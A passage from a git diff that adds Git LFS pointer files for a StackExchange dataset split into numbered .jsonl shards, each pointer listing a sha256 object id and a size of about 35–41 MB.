0000000000000000000000000000000000000000..0991429b816ec0e760357f61cd50ae0888002a37 --- /dev/null +++ b/data/stackexchange/1-1/482_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6eb203f69ee3c07248e82a9de0b1211fef99eedcbf847c28cb004b6dbc718b47 +size 40326619 diff --git a/data/stackexchange/1-1/483_2289.jsonl b/data/stackexchange/1-1/483_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f19a7493da193717cf5664bcaef0a93719fcdf2f --- /dev/null +++ b/data/stackexchange/1-1/483_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9ce488a0796c2fe6fba9d916351f1deedc274eeb99f9ecc304da6cb854e24fd +size 39371395 diff --git a/data/stackexchange/1-1/484_2289.jsonl b/data/stackexchange/1-1/484_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2378ec7ba39b4eef9bf7cbccc12912cd0ef6bb61 --- /dev/null +++ b/data/stackexchange/1-1/484_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a62884e66f8522eb050ce1964fc53002f7d7228caa4abd0f14fc99cea5e483a +size 40144673 diff --git a/data/stackexchange/1-1/485_2289.jsonl b/data/stackexchange/1-1/485_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..aa69c055b27600e10cf545b10b827af5f3833336 --- /dev/null +++ b/data/stackexchange/1-1/485_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da31f5d24bbec266654fb0edba822b0cf0d6b786fe0fef259fa14ab14bafe14a +size 40611567 diff --git a/data/stackexchange/1-1/486_2289.jsonl b/data/stackexchange/1-1/486_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..26af1848c4ca800288713b8eeae5b18e9d000baf --- /dev/null +++ b/data/stackexchange/1-1/486_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b709e5dcbcf80245f999e45677ccaff82b4dc054dfa2fdbc421f7bd34749572b +size 39909267 diff --git a/data/stackexchange/1-1/487_2289.jsonl b/data/stackexchange/1-1/487_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d2273f3730276039870a9a9f4b52d2e25f6f5066 --- /dev/null +++ b/data/stackexchange/1-1/487_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1b5782d521862e785c63164ff1e0b6f09cbc8514d40f21f3b38beb137cf7a5c2 +size 40668655 diff --git a/data/stackexchange/1-1/488_2289.jsonl b/data/stackexchange/1-1/488_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..11becc0f5c656573f26f747fa166ec043ea85622 --- /dev/null +++ b/data/stackexchange/1-1/488_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b8f5b02058e0a1d64178afe43f0e8474cc3f7f7bfc4b97066dc8230bfbd9e53d +size 40129570 diff --git a/data/stackexchange/1-1/489_2289.jsonl b/data/stackexchange/1-1/489_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..646933c53056a539401aceaad53a96d4486e6100 --- /dev/null +++ b/data/stackexchange/1-1/489_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:33471ac2ef8af01fb19b137dcceafb2d59c6b80dbc221ad2fc3ce1bca28dc0c0 +size 40236945 diff --git a/data/stackexchange/1-1/48_2289.jsonl b/data/stackexchange/1-1/48_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4fb1366804649e9963d7c0bbd2a5e32767b292c3 --- /dev/null +++ b/data/stackexchange/1-1/48_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:84bc2ecc2e4e881910ad7781e3d4c2d011e58239afce6e53fd6e205872502ee8 +size 36061605 diff --git a/data/stackexchange/1-1/490_2289.jsonl b/data/stackexchange/1-1/490_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..76ae3d5543aeec5b2e9fdfd63f73b67607076012 --- /dev/null +++ b/data/stackexchange/1-1/490_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8fea52bf57bec645eb2348fe71aef42c4350cafdd87b32cdeb495910e347fb82 +size 40031396 diff --git a/data/stackexchange/1-1/491_2289.jsonl b/data/stackexchange/1-1/491_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..70d1d20226f7f2870a2453b6d73b1f95277991d4 --- /dev/null +++ b/data/stackexchange/1-1/491_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b7ac41f98c76f77e92011072040f9c422612a0d34417e5233853ca4e845f2af +size 40125168 diff --git a/data/stackexchange/1-1/492_2289.jsonl b/data/stackexchange/1-1/492_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8287fa8df1bdd7970845db41f4a01ddcfcdae1f8 --- /dev/null +++ b/data/stackexchange/1-1/492_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4777c2fedbcf0d23210eea5b4e1c2bf4830ff0d9040531a39b2b63ea0abc1479 +size 39882293 diff --git a/data/stackexchange/1-1/493_2289.jsonl b/data/stackexchange/1-1/493_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ac63018dd350b07524edba696369f6a81ad1b71 --- /dev/null +++ b/data/stackexchange/1-1/493_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f00777a805823e4ac94ea1ec586c024f2c144c8015626f68855f65a9bc4685a6 +size 40032856 diff --git a/data/stackexchange/1-1/494_2289.jsonl b/data/stackexchange/1-1/494_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b271dbc0dd606d7243a3e2189555965a01c0e1d5 --- /dev/null +++ b/data/stackexchange/1-1/494_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:008b559795d1ae9853cb50065c29fead8c8e67465592d4736c27bfc3dd0029e7 +size 40164139 diff --git a/data/stackexchange/1-1/495_2289.jsonl b/data/stackexchange/1-1/495_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3fe71d16af67500d99a29bbd0dd23a6eebe68502 --- /dev/null +++ b/data/stackexchange/1-1/495_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eae7e688b598ce7c6a17cee2d73accf350eb5bcbdcc7e2905ff079124ca3d571 +size 40123862 diff --git a/data/stackexchange/1-1/496_2289.jsonl b/data/stackexchange/1-1/496_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a7361b62e248890fa500ec65162aece1a8f92954 --- /dev/null +++ b/data/stackexchange/1-1/496_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7b306c70d5c493bde93310089c9d4a8296420ae22892c021dbfd3a957ee7e364 +size 40332549 diff --git a/data/stackexchange/1-1/497_2289.jsonl b/data/stackexchange/1-1/497_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9202e074f2bbe2ea7e710786306dff0c9fb04659 --- /dev/null +++ b/data/stackexchange/1-1/497_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73429871bd66452a562d7a5f40c76986f533a97d9ff7c30646972805ecd44976 +size 41319420 diff --git a/data/stackexchange/1-1/498_2289.jsonl b/data/stackexchange/1-1/498_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..64b053f0fd87866d6cf6cba12b5f348e7f135c63 --- /dev/null +++ b/data/stackexchange/1-1/498_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fab0f2f8d068b1509f9f07e1436f64f4ec394334838178a9d041c1692e5096eb +size 40246076 diff --git a/data/stackexchange/1-1/499_2289.jsonl b/data/stackexchange/1-1/499_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f4a6f624faa1c53f95eab9a443fb8ff76d52d984 --- /dev/null +++ b/data/stackexchange/1-1/499_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9cc24a24af2a8a699ffa85763df82a540cbfbc60e2bae6c2a344d153e738d586 +size 40653063 diff --git a/data/stackexchange/1-1/49_2289.jsonl b/data/stackexchange/1-1/49_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b787e4247e45738167dde3e9b34e27c6a3c905d8 --- /dev/null +++ b/data/stackexchange/1-1/49_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:86473da24c1ee92c249c505ab114edbfe1277bce13b6c03af26746cea595e823 +size 35965884 diff --git a/data/stackexchange/1-1/4_2289.jsonl b/data/stackexchange/1-1/4_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3e8601cefaafae8046c038ffef23045af8db29e9 --- /dev/null +++ b/data/stackexchange/1-1/4_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:53d4c157452ab2b91e1fe48b6a21fafa0317f21f08f7aefb52db7377e9c88d2e +size 36591431 diff --git a/data/stackexchange/1-1/500_2289.jsonl b/data/stackexchange/1-1/500_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..77d2a7273443f43d31defdef318a13205e6d877b --- /dev/null +++ b/data/stackexchange/1-1/500_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8f721075fea8a63fc8b3628aba65f148744c0688e34452f38fc125b4db6e1da +size 34919274 diff --git a/data/stackexchange/1-1/501_2289.jsonl b/data/stackexchange/1-1/501_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5c2e3771cdde5784a68a160b5b1357a898b13664 --- /dev/null +++ b/data/stackexchange/1-1/501_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1f1ce08772395bf03479fa44bcbaca11b3a8d0df569c88b30c91706615f987ca +size 36044376 diff --git a/data/stackexchange/1-1/502_2289.jsonl b/data/stackexchange/1-1/502_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..425e9b68d20ce3e55b106c69555e440d7d74f547 --- /dev/null +++ b/data/stackexchange/1-1/502_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6938e523f1fd009bc34910a1e803aab96fe01781f9fa6bb8abf50fa084c1d86d +size 35189990 diff --git a/data/stackexchange/1-1/503_2289.jsonl b/data/stackexchange/1-1/503_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ac91245f8ea877984c17a6bf77f41c2c774c221 --- /dev/null +++ b/data/stackexchange/1-1/503_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9f59d9edc39744ffe72a290250bc9373cbf207a5ab32dbb1ef82c3fec1535059 +size 35767702 diff --git a/data/stackexchange/1-1/504_2289.jsonl b/data/stackexchange/1-1/504_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d370fd8ee4e58035a681f6083b782149822fa41b --- /dev/null +++ b/data/stackexchange/1-1/504_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f975bdcded30e57bdc6b75ec52653f2eb09aea5c1cbf680c85e10ca34e59735c +size 35041467 diff --git a/data/stackexchange/1-1/505_2289.jsonl b/data/stackexchange/1-1/505_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9aca37b1e0e259585912da051bca97e3e1ad1068 --- /dev/null +++ b/data/stackexchange/1-1/505_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a959072d44fc2f4d2a3ee45dbc1f18be607521e527d487ce5f871d18d7f78b48 +size 35292292 diff --git a/data/stackexchange/1-1/506_2289.jsonl b/data/stackexchange/1-1/506_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1e2f55af9db8a610bec855574e21ec8421608549 --- /dev/null +++ b/data/stackexchange/1-1/506_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cdef4ad1f446aa53944759da4f8acc9dcb537f8578825c4de0f913821b07188a +size 35666248 diff --git a/data/stackexchange/1-1/507_2289.jsonl b/data/stackexchange/1-1/507_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..375ee9c9d8712956dcda58c8979e9ce4c28eb793 --- /dev/null +++ b/data/stackexchange/1-1/507_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:de2365b77d9599b04d82c7f05d303529eaafa2abab5a411bb823189fbfe2294e +size 35432424 diff --git a/data/stackexchange/1-1/508_2289.jsonl b/data/stackexchange/1-1/508_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad9d0653921286c70c94e1fff9ef0c41012e5b25 --- /dev/null +++ b/data/stackexchange/1-1/508_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5226be7dbc41cb3aaa4abdf2d50c6085e3c88e91e87d138e30cec4df90ee01c8 +size 35166700 diff --git a/data/stackexchange/1-1/509_2289.jsonl b/data/stackexchange/1-1/509_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a1b283d7bbeeee0f059d7e8da20333b065047296 --- /dev/null +++ b/data/stackexchange/1-1/509_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a0b0c704795f37e8e36337dbb612a75e30dfccf1b9ceb9276dc4d26aaf30f67 +size 35307252 diff --git a/data/stackexchange/1-1/50_2289.jsonl b/data/stackexchange/1-1/50_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1c97e189e8b3df0368fd9c74ed53747f3ffc31ad --- /dev/null +++ b/data/stackexchange/1-1/50_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:efcc7037524b3134bd456b673948adec62f468917a1084b946377c865d288a87 +size 40222373 diff --git a/data/stackexchange/1-1/510_2289.jsonl b/data/stackexchange/1-1/510_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d23d069c8cd74d54b7dc7a817b3917fd1b145744 --- /dev/null +++ b/data/stackexchange/1-1/510_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec787e120181d933ef9cd67b344605a91b0ee5e5176e7cc907929580a0b962da +size 35148813 diff --git a/data/stackexchange/1-1/511_2289.jsonl b/data/stackexchange/1-1/511_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f687e9e83be6fb8294a05f95104a1c55a29a08c --- /dev/null +++ b/data/stackexchange/1-1/511_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:23474f77613bed86e6b9880ab0ab25fe1e7f8bba19eea7c766c6ba5dae8f2265 +size 35369363 diff --git a/data/stackexchange/1-1/512_2289.jsonl b/data/stackexchange/1-1/512_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..25eef2536a74f3e2701763c9325dfe5131eeebb5 --- /dev/null +++ b/data/stackexchange/1-1/512_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:892f65eacb835bb78adbf446d3971cd75344ad8251b661180dcb21b87c0eeab5 +size 35308820 diff --git a/data/stackexchange/1-1/513_2289.jsonl b/data/stackexchange/1-1/513_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..32e780847065dbdde5362f41a3898128e3638d63 --- /dev/null +++ b/data/stackexchange/1-1/513_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c9e3134265f65ea9eeac85cea94842ea9bdc076544ce7535d18f1bc3d510c9e0 +size 35932062 diff --git a/data/stackexchange/1-1/514_2289.jsonl b/data/stackexchange/1-1/514_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e617365fdf4dfe286f5f0ebc7229d301b8d9dc1 --- /dev/null +++ b/data/stackexchange/1-1/514_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9dad2d42592b2aa2056bff6cf1a91170975b6c66b6d59f61d4bf9fa53b885dc4 +size 35136292 diff --git a/data/stackexchange/1-1/515_2289.jsonl b/data/stackexchange/1-1/515_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0ab9fd57b43c2b1c18e9791b88f1cd6da3b45f4 --- /dev/null +++ b/data/stackexchange/1-1/515_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30ff588364364a13fab16dce30550407153d757cd7bb091b0aa6a0f25d09889e +size 34784639 diff --git a/data/stackexchange/1-1/516_2289.jsonl b/data/stackexchange/1-1/516_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8a784b9be13eca3feacae8774fb58d8c3680b5ae --- /dev/null +++ b/data/stackexchange/1-1/516_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c51c04e986ec487e59503f0a0abc9758b1ec3bc7fe7ad0fecfa504ad32facb27 +size 35267708 diff --git a/data/stackexchange/1-1/517_2289.jsonl b/data/stackexchange/1-1/517_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..53279be1d90ccff5dd5e7c96bf97036612914bf0 --- /dev/null +++ b/data/stackexchange/1-1/517_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9d1538f3bcac66a750b711facbfd43b2f84798fa3c78dbf5dffd650ecfce70b6 +size 35454040 diff --git a/data/stackexchange/1-1/518_2289.jsonl b/data/stackexchange/1-1/518_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..47102889245ce7adbec834a7b1fe65fc6397898b --- /dev/null +++ b/data/stackexchange/1-1/518_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:553a00848cc0913cbdf2c1debdd5efcd73781a5e7eef70542f18c9ad20e82435 +size 34883015 diff --git a/data/stackexchange/1-1/519_2289.jsonl b/data/stackexchange/1-1/519_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ea6aee3da9c3259ff868a3a796b1d6bdb8b1f9d --- /dev/null +++ b/data/stackexchange/1-1/519_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c0c841ba70458500710bcd7fd7116cbac742543ce1f7c29522b401c4c2980a09 +size 35085324 diff --git a/data/stackexchange/1-1/51_2289.jsonl b/data/stackexchange/1-1/51_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..58f4a3fea35c5eee09b4b4329fcf7eca7cb15f0c --- /dev/null +++ b/data/stackexchange/1-1/51_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:518aa269ff1b8335e40f953c6bb92dc1a25f1ff61a69f06243880aa6753f4da4 +size 39724043 diff --git a/data/stackexchange/1-1/520_2289.jsonl b/data/stackexchange/1-1/520_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e1360f2c2f51a95d4113aae0e06cfeef2ad00cbd --- /dev/null +++ b/data/stackexchange/1-1/520_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a21d8522724f8dbffacca392868ac52d85f1227f092c7fd36a53f091eb333ae +size 35087250 diff --git a/data/stackexchange/1-1/521_2289.jsonl b/data/stackexchange/1-1/521_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3ac263dfb4cfa415321c45e0b6836a87b3c4d20a --- /dev/null +++ b/data/stackexchange/1-1/521_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:49a70bde110dec3768bbbf8614d15a15044e1d3bb21ea8d6b86c4922b03afbc9 +size 35171402 diff --git a/data/stackexchange/1-1/522_2289.jsonl b/data/stackexchange/1-1/522_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..30ae23e5ae8e361631a616374d4b826ed9a90222 --- /dev/null +++ b/data/stackexchange/1-1/522_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50972cc9016e807da344178014e8b053bd27f004b512c32eeadc4e476110af17 +size 35334064 diff --git a/data/stackexchange/1-1/523_2289.jsonl b/data/stackexchange/1-1/523_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b1d2b27735a6ab5cde3ce613915b7d247923f48 --- /dev/null +++ b/data/stackexchange/1-1/523_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:74d324dea427de0c7798fbeebfcba47f6eaae8e197c4f2bcf7270fd32df9e839 +size 35138931 diff --git a/data/stackexchange/1-1/524_2289.jsonl b/data/stackexchange/1-1/524_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e49704693ab6b934538fcc8849059afb2993e66a --- /dev/null +++ b/data/stackexchange/1-1/524_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0e1f14ce7200315bfec0074941c73e72fa6258ba464415d2fdc789800a47063a +size 35356491 diff --git a/data/stackexchange/1-1/525_2289.jsonl b/data/stackexchange/1-1/525_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..588bcf8ac3bcd7d80b780a9766e2d4c601c84665 --- /dev/null +++ b/data/stackexchange/1-1/525_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3609f373c67e8a8b42a0079ee34b9b708cb31c5cd6e08f7e1a42b5bdb01e6e3f +size 35214279 diff --git a/data/stackexchange/1-1/526_2289.jsonl b/data/stackexchange/1-1/526_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e0b7170e8bdcd2d8740c1a56bbd96b94decfceec --- /dev/null +++ b/data/stackexchange/1-1/526_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3392b2d4ed497a7a8e5c79ea4ca68f756438c24c807633b3f37f8682db345368 +size 35338891 diff --git a/data/stackexchange/1-1/527_2289.jsonl b/data/stackexchange/1-1/527_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f8a6ab57d260c6f7bf35d923d5b98e838a390b83 --- /dev/null +++ b/data/stackexchange/1-1/527_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f64d0e3d329002c257871523c6a189b31b43b6c827514695c7f4427394205902 +size 35896674 diff --git a/data/stackexchange/1-1/528_2289.jsonl b/data/stackexchange/1-1/528_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d0e2d65ebcbe22b833ce7cff3c9ce3bae016cc9d --- /dev/null +++ b/data/stackexchange/1-1/528_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4818befd671e45369ea0a260384624655e3d5764da8dbd049f0e02dad5358ddd +size 35306372 diff --git a/data/stackexchange/1-1/529_2289.jsonl b/data/stackexchange/1-1/529_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a72ba7eeed2c6fb507eb10f34f56aa864c3b931b --- /dev/null +++ b/data/stackexchange/1-1/529_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:689c09f821032956fc7624c92a6afbb3f2d98342f619cd1132a3138e2e200824 +size 35132659 diff --git a/data/stackexchange/1-1/52_2289.jsonl b/data/stackexchange/1-1/52_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8882fe3391a5fcc342b4a8fe7b2297db3ea6cc54 --- /dev/null +++ b/data/stackexchange/1-1/52_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5de766b362caf6541b4ed6a3eb4612c60bb5aa9c877555981cd1603eb1d66b6 +size 40167628 diff --git a/data/stackexchange/1-1/530_2289.jsonl b/data/stackexchange/1-1/530_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19da21901515fc9d78f8f1ec6212105fb0f16c53 --- /dev/null +++ b/data/stackexchange/1-1/530_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:13348510168e8da33e7adf950a880e8e48e92f2c15572052a167328afa14a97b +size 35004179 diff --git a/data/stackexchange/1-1/531_2289.jsonl b/data/stackexchange/1-1/531_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b4a2e9afe936d492f13b9a1ec762ca21b37da038 --- /dev/null +++ b/data/stackexchange/1-1/531_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:52a1a6609dae6437d2d16d85c6f2ab6cdd18eb3e3c4c5f4f4c13e8682e815267 +size 35293317 diff --git a/data/stackexchange/1-1/532_2289.jsonl b/data/stackexchange/1-1/532_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6a12e02cf54a84dc42ba80bea0e7fde5fb7db13a --- /dev/null +++ b/data/stackexchange/1-1/532_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4537b29dfafafedbfbdc5b526a814c24fc96d2cff680fa4e1bb12242d6bdc523 +size 35875366 diff --git a/data/stackexchange/1-1/533_2289.jsonl b/data/stackexchange/1-1/533_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a33d18405ef8c1f7d15219a34e5bee5fa034865c --- /dev/null +++ b/data/stackexchange/1-1/533_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5b675801717cc62d6d90317f1715bddea61aceaeec34c15cbface0800f2d50b +size 35722948 diff --git a/data/stackexchange/1-1/534_2289.jsonl b/data/stackexchange/1-1/534_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..52c936defd9de5e2683d93eaa54124ba50eff2bd --- /dev/null +++ b/data/stackexchange/1-1/534_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b3d5dd24c85313db5868db9f8930994f05a971f240bbe36a4ba35a464f6839c6 +size 35275898 diff --git a/data/stackexchange/1-1/535_2289.jsonl b/data/stackexchange/1-1/535_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c4073562380eb13ffeef425e7ca7cceff92340a0 --- /dev/null +++ b/data/stackexchange/1-1/535_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b080a90bf99655db000d345338b8161b365c1318256c0819714a96c1ecf6255d +size 35771950 diff --git a/data/stackexchange/1-1/536_2289.jsonl b/data/stackexchange/1-1/536_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bb249860d414310e9e960b99f19b44ae47621d30 --- /dev/null +++ b/data/stackexchange/1-1/536_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:10eb0021256a755ecf8da4a74fb2cbd1cf95b8e7185e730ba99807576f561ad0 +size 35510344 diff --git a/data/stackexchange/1-1/537_2289.jsonl b/data/stackexchange/1-1/537_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f89a55cdaf45ce0eab8c972d578f91a9b00955b7 --- /dev/null +++ b/data/stackexchange/1-1/537_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec104cc305ade3a64474e78e4542c5c95927f4affcd785e7a660f1ff3e26517d +size 35240162 diff --git a/data/stackexchange/1-1/538_2289.jsonl b/data/stackexchange/1-1/538_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ca5fc0bfb8c393cc7e21c955d1cfa5bfe4b679d6 --- /dev/null +++ b/data/stackexchange/1-1/538_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8383c09fb1d970e5a8ffa17d985ed7fc614f0edeb2ba57849343274b906b27c3 +size 35252672 diff --git a/data/stackexchange/1-1/539_2289.jsonl b/data/stackexchange/1-1/539_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1fb0377f47e820e3283f9ce355a8218c80cc5a3c --- /dev/null +++ b/data/stackexchange/1-1/539_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3c3d3dce8d7451da0b892ce9b5d39f0d9c2d4474e3dba6d3fbbd1c6e935da1ee +size 35044319 diff --git a/data/stackexchange/1-1/53_2289.jsonl b/data/stackexchange/1-1/53_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a68c89d2305d0cb87baeaddff677e5a04cabe659 --- /dev/null +++ b/data/stackexchange/1-1/53_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c57eca88dae088a4b3bf2f47c15cd845bef8005e9e0ff1ecd2cd2611a05feca1 +size 38750672 diff --git a/data/stackexchange/1-1/540_2289.jsonl b/data/stackexchange/1-1/540_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a657a0417e7464e6894cca7d943730aeac455797 --- /dev/null +++ b/data/stackexchange/1-1/540_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cf98e62f59e1e9368bb7d12e53dbd785e37d161f31f1654018cbe87dab267ba3 +size 35792389 diff --git 